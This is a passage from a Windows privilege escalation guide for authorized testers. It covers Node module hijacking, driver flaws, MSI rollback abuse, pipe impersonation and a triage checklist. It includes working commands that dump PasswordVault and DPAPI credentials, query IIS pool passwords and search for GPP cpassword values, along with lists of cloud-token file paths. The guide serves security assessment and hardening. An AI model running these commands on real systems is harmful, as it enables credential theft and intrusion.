   2438 ```batch
   2439 procdump.exe -accepteula -ma <process-name-or-pid> process.dmp
   2440 ```
   2441 
   2442 Memory dumps can contain credentials, tokens, personal data, and encryption keys. Store and dispose of them as sensitive evidence.
   2443 
   2444 ## 9.6 Node.js and Electron Root-Module Hijacking
   2445 
   2446 Node resolves a bare import such as `require('foo')` by walking parent directories for `node_modules`. On Windows, an application below `C:\` can ultimately probe `C:\node_modules`. If a low-privileged user can create that directory and a privileged Node/Electron application requests a missing package, attacker-controlled JavaScript may execute in the application's context.
   2447 
   2448 Example resolution path:
   2449 
   2450 ```text
   2451 C:\Users\Administrator\project\node_modules\foo
   2452 C:\Users\Administrator\node_modules\foo
   2453 C:\Users\node_modules\foo
   2454 C:\node_modules\foo
   2455 ```
   2456 
   2457 Hunt with Procmon using these filters:
   2458 
   2459 - process name is the target Node/Electron executable;
   2460 - path contains `node_modules`;
   2461 - result is `NAME NOT FOUND`;
   2462 - a later lookup reaches `C:\node_modules`.
   2463 
   2464 Review unpacked application sources and ASAR content for bare imports, optional dependencies, and swallowed import failures:
   2465 
   2466 ```bash
   2467 rg -n 'require\("[^./]' .
   2468 rg -n "require\('[^./]" .
   2469 rg -n 'optionalDependencies' .
   2470 ```
   2471 
   2472 Safe validation is to export a distinctive marker from a harmless test module and verify that the target loads it. Do not launch a payload until the target's integrity level and authorization scope are established.
   2473 
   2474 Hardening:
   2475 
   2476 - deny standard-user creation or modification of `C:\node_modules`;
   2477 - package every runtime dependency, including optional modules that are probed at startup;
   2478 - alert on high-integrity processes loading JavaScript from drive-root module folders;
   2479 - remove silent `try { require(...) } catch {}` probes where possible.
   2480 
   2481 ## 9.7 Driver Attack Surface
   2482 
   2483 ### Missing `FILE_DEVICE_SECURE_OPEN`
   2484 
   2485 For a named device object, a restrictive DACL may protect `\\.\DeviceName` while a relative/trailing-name open such as `\\.\DeviceName\anything` bypasses that device ACL if the driver does not set `FILE_DEVICE_SECURE_OPEN` or enforce equivalent checks in `IRP_MJ_CREATE`.
   2486 
   2487 Audit workflow:
   2488 
   2489 1. Enumerate third-party drivers and their device names.
   2490 2. Compare direct opens with trailing-component opens as a standard user.
   2491 3. Enumerate accepted IOCTLs and required access bits.
   2492 4. Inspect whether privileged operations independently validate the caller.
   2493 5. Match driver versions and hashes against vendor advisories and Microsoft's vulnerable-driver blocklist.
   2494 
   2495 Once opened, dangerous IOCTLs may expose process handles, arbitrary termination, raw disk I/O, or kernel read/write. Opening the device is only the access-control finding; exploitability depends on the reachable IOCTL implementation.
   2496 
   2497 Driver developers should set `FILE_DEVICE_SECURE_OPEN`, reject unexpected trailing names, use restrictive IOCTL access masks, validate the requestor mode and caller identity, and avoid returning privileged handles to untrusted callers.
   2498 
   2499 ### Registry query type confusion
   2500 
   2501 During driver review, flag `RtlQueryRegistryValues` calls that combine:
   2502 
   2503 - `RTL_REGISTRY_ABSOLUTE` with a user-influenced path;
   2504 - `RTL_QUERY_REGISTRY_DIRECT` without `RTL_QUERY_REGISTRY_TYPECHECK`;
   2505 - a small scalar `EntryContext` reused across reads of different registry types;
   2506 - a first read whose attacker-controlled value determines the size or destination of a second read.
   2507 
   2508 `REG_QWORD`, string, and binary values have different direct-mode expectations. Treat heterogeneous reads into the same stack variable as a strong memory-corruption lead. Windows 8 and later add checks for untrusted hives, so assess writable keys in trusted system hives and reproduce on the exact build.
   2509 
   2510 ### Race-condition and I/O ring research notes
   2511 
   2512 For authorized kernel research, investigate these patterns:
   2513 
   2514 - a request completed or freed while a cancel-safe queue lock is still held;
   2515 - a cancel path that resumes with a stale request pointer;
   2516 - a buffer pointer captured under a lock but copied to user mode after the lock is released;
   2517 - attacker-controlled, variable-size paged-pool pointer arrays;
   2518 - predictable writes that can corrupt a sprayed object's size field and create an out-of-bounds read.
   2519 
   2520 Useful debugger indicators include `NtCancelIoFileEx -> IopCsqCancelRoutine`, a success path shaped like `Acquire -> Complete/free -> Release`, and `RtlCopyToUser` after lock release. These are research heuristics, not evidence that a particular driver is exploitable.
   2521 
   2522 ## 9.8 Expanded Credential and Secret Locations
   2523 
   2524 ### UWP PasswordVault / Credential Locker
   2525 
   2526 The current interactive user may be able to decrypt credentials stored for that same session without administrator rights:
   2527 
   2528 ```powershell
   2529 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
   2530 $vault = New-Object Windows.Security.Credentials.PasswordVault
   2531 $vault.RetrieveAll() | ForEach-Object {
   2532   try {
   2533     $_.RetrievePassword()
   2534     $_
   2535   } catch {}
   2536 } | Select-Object Resource,UserName,Password
   2537 ```
   2538 
   2539 Access is session- and user-scoped. Treat returned values as sensitive evidence and avoid printing them into persistent logs unnecessarily.
   2540 
   2541 ### DPAPI and PowerShell credentials
   2542 
   2543 ```powershell
   2544 Get-ChildItem -Force "$env:APPDATA\Microsoft\Protect"
   2545 Get-ChildItem -Force "$env:LOCALAPPDATA\Microsoft\Protect"
   2546 Get-ChildItem -Force "$env:APPDATA\Microsoft\Credentials"
   2547 Get-ChildItem -Force "$env:LOCALAPPDATA\Microsoft\Credentials"
   2548 
   2549 $credential = Import-Clixml -Path 'C:\path\credential.xml'
   2550 $credential.GetNetworkCredential() | Format-List UserName,Domain,Password
   2551 ```
   2552 
   2553 An exported PowerShell credential normally decrypts only for the same user on the same computer unless it was protected with an explicit key. DPAPI master-key recovery should be documented separately from decryption of individual credential blobs.
   2554 
   2555 ### Additional high-value stores
   2556 
   2557 ```text
   2558 %LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
   2559 %LOCALAPPDATA%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
   2560 %APPDATA%\gcloud\credentials.db
   2561 %APPDATA%\gcloud\legacy_credentials\
   2562 %APPDATA%\gcloud\access_tokens.db
   2563 %USERPROFILE%\.aws\credentials
   2564 %USERPROFILE%\.azure\accessTokens.json
   2565 %USERPROFILE%\.azure\azureProfile.json
   2566 ```
   2567 
   2568 Check saved RDP and PuTTY metadata:
   2569 
   2570 ```batch
   2571 reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
   2572 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
   2573 reg query "HKCU\Software\SimonTatham\PuTTY\SshHostKeys" /s
   2574 reg query "HKCU\Software\OpenSSH\Agent\Keys" /s
   2575 ```
   2576 
   2577 OpenSSH agent implementations have changed over time; the absence of `HKCU\Software\OpenSSH\Agent\Keys` is normal on many current builds. Verify how the installed client stores loaded keys rather than assuming the historical registry technique applies.
   2578 
   2579 ### IIS AppCmd
   2580 
   2581 If IIS is present and the current token is elevated, AppCmd may reveal application-pool or virtual-directory credentials:
   2582 
   2583 ```batch
   2584 %SystemRoot%\System32\inetsrv\appcmd.exe list apppools /text:name
   2585 %SystemRoot%\System32\inetsrv\appcmd.exe list apppool "<pool>" /text:processModel.userName
   2586 %SystemRoot%\System32\inetsrv\appcmd.exe list apppool "<pool>" /text:processModel.password
   2587 %SystemRoot%\System32\inetsrv\appcmd.exe list vdir /text:vdir.name
   2588 ```
   2589 
   2590 ### Cached Group Policy Preferences
   2591 
   2592 Search local Group Policy history and domain SYSVOL for preference XML containing `cpassword`:
   2593 
   2594 ```powershell
   2595 Get-ChildItem 'C:\ProgramData\Microsoft\Group Policy\History' -Recurse -File -ErrorAction SilentlyContinue |
   2596   Where-Object Name -in 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml' |
   2597   Select-String -Pattern 'cpassword'
   2598 ```
   2599 
   2600 The historical GPP AES key is public, so any discovered `cpassword` must be treated as compromised even if the preference is no longer actively deployed.
   2601 
   2602 ## 9.9 WSL, PATH, and Application-Specific Search Paths
   2603 
   2604 ### WSL inventory
   2605 
   2606 ```batch
   2607 wsl.exe --status
   2608 wsl.exe --list --verbose
   2609 wsl.exe --list --online
   2610 ```
   2611 
   2612 For each installed distribution, establish the default user and inspect mounted Windows paths. Root inside a WSL distribution is not automatically Windows SYSTEM, but exposed Windows files, credentials, sockets, interop, and permissive mounts can create crossover paths. Do not use legacy launcher commands such as `distribution.exe config --default-user root` without confirming the installed distribution and engagement scope.
   2613 
   2614 ### Writable PATH entries
   2615 
   2616 ```batch
   2617 for %A in ("%PATH:;=" "%") do @icacls "%~A" 2>nul
   2618 ```
   2619 
   2620 For every writable PATH directory, prove that a privileged process searches it for a missing DLL or executable. A writable directory alone is a lead, not a finding.
   2621 
   2622 ### Plugin and extension autoload
   2623 
   2624 Portable or copied applications may place plugin directories under user-writable paths. Notepad++, IDEs, browsers, database clients, and monitoring agents are common examples. Identify exact autoload rules, confirm the directory ACL, and establish whether a higher-privileged user or process launches the application.
   2625 
   2626 ## 9.10 Handles, Pipes, and Local IPC
   2627 
   2628 ### Inherited or leaked handles
   2629 
   2630 A low-privileged child process may inherit a handle to a privileged process, thread, token, file, or registry key if the parent marked it inheritable and created the child with handle inheritance enabled. Enumerate handle type and granted access; a handle is useful only if its access mask supports a meaningful operation.
   2631 
   2632 High-risk examples include:
   2633 
   2634 - process handles with VM write, thread creation, or duplication rights;
   2635 - token handles with duplicate, assign-primary, or impersonate rights;
   2636 - writable handles to protected files or registry keys;
   2637 - section handles mapping sensitive shared memory.
   2638 
   2639 ### Named-pipe client impersonation
   2640 
   2641 If the current token holds `SeImpersonatePrivilege`, a controllable pipe server may impersonate a privileged client after that client connects and writes. The hard part is coercing the privileged client to an attacker-chosen pipe and obtaining an impersonation level that permits token duplication.
   2642 
   2643 ```batch
   2644 whoami /priv
   2645 pipelist.exe /accepteula
   2646 ```
   2647 
   2648 Use PipeViewer or equivalent tooling to map owners, permissions, server processes, and client behavior. A visible pipe name alone is not an escalation path.
   2649 
   2650 ### Telephony `tapsrv` research
   2651 
   2652 The Telephony service's `\\pipe\\tapsrv` MS-TRP interface has been used in research chains where an authenticated client converted asynchronous event handling into a controlled DWORD write to an existing path writable by `NETWORK SERVICE`, modified Telephony administration state, and then loaded a provider UI DLL. Treat this as a version-specific protocol-research lead: verify the affected build and reproduce in a snapshot before testing any production host.
   2653 
   2654 ## 9.11 File-System Redirection and Windows Installer Rollback
   2655 
   2656 Windows local escalation research frequently turns a limited privileged file primitive into a stronger one by combining:
   2657 
   2658 - NTFS junctions or mount points;
   2659 - Object Manager symbolic links, often through `\RPC Control`;
   2660 - opportunistic locks to pause a privileged operation;
   2661 - Windows Installer rollback files in `C:\Config.Msi`;
   2662 - an attacker-retained handle whose granted access survives later ACL changes.
   2663 
   2664 ### MSI rollback concept
   2665 
   2666 At a high level, the `Config.Msi` technique:
   2667 
   2668 1. forces Windows Installer to create rollback files;
   2669 2. pauses the installer at a deterministic point;
   2670 3. uses an arbitrary folder-delete primitive to remove `C:\Config.Msi`;
   2671 4. recreates it with attacker-controlled permissions;
   2672 5. retains a handle while the installer restores restrictive ACLs;
   2673 6. substitutes rollback script/data files;
   2674 7. causes SYSTEM to restore attacker-controlled content into a protected location.
   2675 
   2676 If the available primitive deletes only files, researchers have targeted the directory's `::$INDEX_ALLOCATION` stream so the operation removes the directory metadata. If the primitive deletes only the contents of an attacker-controlled folder, an oplock plus junction and Object Manager link may redirect the deletion to that stream.
   2677 
   2678 This is a lab technique with a real risk of corrupting Windows Installer state or protected files. Snapshot the VM first, instrument every path resolution with Procmon, and use a harmless protected destination for validation.
   2679 
   2680 ### Privileged log and export paths
   2681 
   2682 When a SYSTEM service reads a writable configuration value for a log, report, or export destination, test whether junctions and Object Manager links can redirect the final open to another file. Confirm:
   2683 
   2684 - the configuration is writable by the current user;
   2685 - the service opens the path with a mode that overwrites or creates content;
   2686 - path canonicalization occurs before or after impersonation;
   2687 - the target file is opened by the privileged service, not by a broker running as the user.
   2688 
   2689 Avoid destructive proof targets such as boot-critical drivers. Demonstrate the primitive against a disposable protected file agreed in the rules of engagement.
   2690 
   2691 ## 9.12 Fast Triage Checklist
   2692 
   2693 ```text
   2694 [ ] Exact Windows edition, build, architecture, and hotfixes
   2695 [ ] Current identity, integrity level, token privileges, and groups
   2696 [ ] Defender/EDR, PowerShell logging, audit policy, and WEF
   2697 [ ] Services: ACLs, binary/parent ACLs, registry ACLs, triggers, failures
   2698 [ ] Scheduled tasks, autoruns, COM registrations, plugins, and updaters
   2699 [ ] Loopback TCP/UDP listeners and named-pipe/RPC endpoints
   2700 [ ] Installed product and driver versions matched to advisories
   2701 [ ] Writable PATH, DLL search, Node/Electron module, and plugin paths
   2702 [ ] WSUS URL, enablement, proxy, and certificate-trust configuration
   2703 [ ] Credential Manager, PasswordVault, DPAPI, history, configs, cloud CLIs
   2704 [ ] WSL distributions, mounts, interop, and exposed Windows credentials
   2705 [ ] Inherited handles and privileged client connections to controllable pipes
   2706 [ ] Any delete/move/create/write primitive mapped to a safe proof target
   2707 ```
   2708 
   2709 ---
   2710 
   2711 ## References and Tools
   2712 
   2713 | Resource | URL |
   2714 |----------|-----|
   2715 | WinPEAS | https://github.com/carlospolop/PEASS-ng |
   2716 | Seatbelt | https://github.com/GhostPack/Seatbelt |
   2717 | SharpUp | https://github.com/GhostPack/SharpUp |
   2718 | PowerUp | https://github.com/PowerShellMafia/PowerSploit |
   2719 | PrivescCheck | https://github.com/itm4n/PrivescCheck |
   2720 | PrintSpoofer | https://github.com/itm4n/PrintSpoofer |
   2721 | GodPotato | https://github.com/BeichenDream/GodPotato |
   2722 | Mimikatz | https://github.com/gentilkiwi/mimikatz |
   2723 | Impacket | https://github.com/SecureAuthCorp/impacket |
   2724 | LaZagne | https://github.com/AlessandroZ/LaZagne |
   2725 | SessionGopher | https://github.com/Arvanaghi/SessionGopher |
   2726 | Watson | https://github.com/rasta-mouse/Watson |
   2727 | LOLBins | https://lolbas-project.github.io |
   2728 | HackTricks Windows | https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation |
   2729 | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
   2730 | MDSec RegPwn research | https://www.mdsec.co.uk/2026/03/rip-regpwn/ |
   2731 | ZDI Node.js module resolution research | https://www.thezdi.com/blog/2026/4/8/nodejs-trust-falls-dangerous-module-resolution-on-windows |
   2732 | Microsoft: Controlling Device Namespace Access | https://learn.microsoft.com/windows-hardware/drivers/kernel/controlling-device-namespace-access |
   2733 | Microsoft: Service Trigger Events | https://learn.microsoft.com/windows/win32/services/service-trigger-events |
   2734 | Microsoft: PowerShell Logging | https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_logging_windows |
   2735 | Microsoft: Windows LAPS | https://learn.microsoft.com/windows-server/identity/laps/laps-overview |
   2736 | Microsoft: Vulnerable Driver Blocklist | https://learn.microsoft.com/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules |
   2737 | GoSecure: WSUS CVE-2020-1013 | https://gosecure.ai/blog/2020/09/03/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-0-day/ |
   2738 | ZDI: Filesystem EoP techniques | https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks |
   2739 
   2740 ---
   2741 
   2742 *This guide represents the state of Windows privilege escalation techniques as of September 2026. Always verify techniques in a controlled environment before use in production assessments. Ensure proper authorization before testing any systems.*